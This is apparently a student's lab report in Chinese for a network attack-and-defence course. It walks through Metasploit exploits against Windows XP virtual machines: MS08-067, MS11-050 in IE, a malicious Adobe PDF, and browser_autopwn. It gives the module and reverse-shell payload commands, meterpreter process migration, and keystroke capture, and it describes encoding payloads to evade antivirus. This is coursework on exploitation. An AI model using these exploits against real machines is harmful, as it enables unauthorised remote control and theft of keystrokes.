20145227鄢曼君《網絡對抗》MSF基礎應用

20145227鄢曼君《網絡對抗》MSF基礎應用

主動攻擊:ms08_067漏洞攻擊實踐

  • 兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3(英文版)。在VMware中設置兩臺虛擬機網絡爲NAT模式,讓兩臺虛擬機ping通。
  • 在kali終端中開啓msfconsole。
  • 輸入命令search ms08_067,會顯示出找到的滲透模塊:

  • 輸入命令use exploit/windows/smb/ms08_067_netapi,進入該漏洞模塊的使用。
  • 輸入命令show payloads會顯示出有效的攻擊載荷,咱們找到一個shell_reverse_tcp。

  • 使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷。
  • 輸入命令set LHOST "kali Ip" set RHOST "Win xp Ip"

  • 使用命令show options查看payload狀態。

  • 輸入命令exploit開始攻擊,攻擊成功。

  • 在kali上執行ipconfig/all獲得以下圖所示:

  • 在win xp上執行一樣的命令,以下圖所示:

  • 能夠發現兩者結果相同,說明成功攻擊。
  • 還能夠進行MS08_067遠程漏洞攻擊實踐:meterpreter
  • 前面都和上面的步驟相同。設置payload:set payload windows/meterpreter/reverse_tcp
  • 輸入命令exploit開始攻擊,攻擊成功。

對瀏覽器攻擊:MS11_050漏洞滲透攻擊實踐

  • 兩臺虛擬機相互ping通。
  • kali中開啓msfconsole。因爲此次作的是ms11_050漏洞攻擊,輸入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用該模塊;info便可查看關於該漏洞的信息

  • 設置相關信息:

  • show options查看設置好的相關信息:

  • exploit,靶機訪問的ip地址如圖:

  • 在靶機IE上輸入網址,並在靶機上查看信息。

  • 查看kali,顯示一個session 1已經建立:

  • 輸入命令sessions -i 1,開始鏈接:

  • 攻擊成功。能夠進行一些操做,好比獲取shell

  • 或者進行按鍵抓取:

Adobe閱讀器滲透攻擊

  • kali下打開顯示隱藏文件。
  • 在kali終端中開啓msfconsole
  • 輸入命令use exploit/windows/fileformat/adobe_cooltype_sing,進入該漏洞模塊的使用。
  • 使用命令set payload windows/meterpreter/reverse_tcp設置攻擊有效載荷。
  • 設置相關數據:

  • 使用命令show options,看是否設置成功。

  • 輸入exploit,生成pdf文件,並能夠看到pdf所在文件夾,將pdf複製到靶機裏。

  • 使用back退出當前模塊,並使用use exploit/multi/handler新建一個監聽模塊。
  • 使用set payload windows/meterpreter/reverse_tcp創建一個反向鏈接。注意的是,這裏須要輸入命令set LPORT 5227和攻擊模塊裏的數據設置爲同樣的。
  • 使用命令exploit開始攻擊,在xp中打開pdf。攻擊成功結果以下圖:

  • 將進程遷移到explorer.exe.使用ps查看當前進程,並找到explorer.exe的進程號,以下圖所示:

  • 使用命令migrate 296 成功後輸入shell,可查看xp靶機信息。還可進行一些操做。

  • 在靶機xp中使用命令netstat -an,看本地tcp鏈接。發現成功鏈接。

輔助模塊應用:使用瀏覽器滲透攻擊server/browser_autopwn 模塊

  • browser_autopwn 是 Metasploit 提供的輔助功能模塊。在用戶訪問 Web 頁面時,它會自動攻擊受害者的瀏覽器。在開始攻擊以前,browser_autopwn 可以檢測用戶使用的瀏覽器類型,根據瀏覽器的檢測結果,自行部署最合適的 exploit。
  • 這是針對瀏覽器程序自己的滲透攻擊,主要利用瀏覽器自己的漏洞,如 IE 瀏覽器,常常因爲自身安全漏洞致使攻擊者可以構造惡意網頁進行滲透攻擊。
  • 打開終端窗口,啓動msfconsole,選擇 server/browser——autopwn 模塊,配置 LHOST、 SRVHOST 爲主控端 IP,設置 URIPATH 爲 auto。最後運行run

  • 以後 metasploit 會自動生成利用瀏覽器自己的一些典型漏洞的網頁,此處生成了 20 個。

  • 攻擊成功。查看檢測結果,能夠看到kali向靶機發送了不少數據包,用於檢測該漏洞是否能利用,實際上靶機是打開了不少個網頁,訪問了產生的20個頁面。

  • 能夠進行一些操做:

  • 或者執行ipconfig命令:

問題回答

用本身的話解釋什麼是exploit,payload,encode.

  • exploit就至關因而一個運載的工具,將負責攻擊的代碼傳送到靶機中。
  • payload也就是負責攻擊的代碼,以前咱們實驗就作過。
  • encode也就是編碼,它主要有兩個功能,一是爲了不以前的payload中出現壞字符,二就是它要假裝從而實現免殺,不讓殺毒軟件很輕易的就發現payload是攻擊代碼。

實驗體會

  • 此次實驗最大的感覺就是電腦有一個大的內存條是多麼重要。以前作的時候同時開兩個虛擬機電腦卡的要死,作一夜只能作一點點,時間都浪費在等電腦反應上了。後面換了一個大的內存條,實驗就很順暢了。而後此次實驗老師要求至少有一個和別人不同,我以爲這點很是好,讓咱們在作的過程當中能更多的去思考,而不是徹底照着別人的過一遍而不思考。還有一個感覺就是咱們此次實驗攻擊的靶機都是xp系統,漏洞都是很早以前的,要想攻擊如今的電腦可就沒有這麼容易了。有點期待下一週的任務了,又會有什麼不同的呢?
相關文章
相關標籤/搜索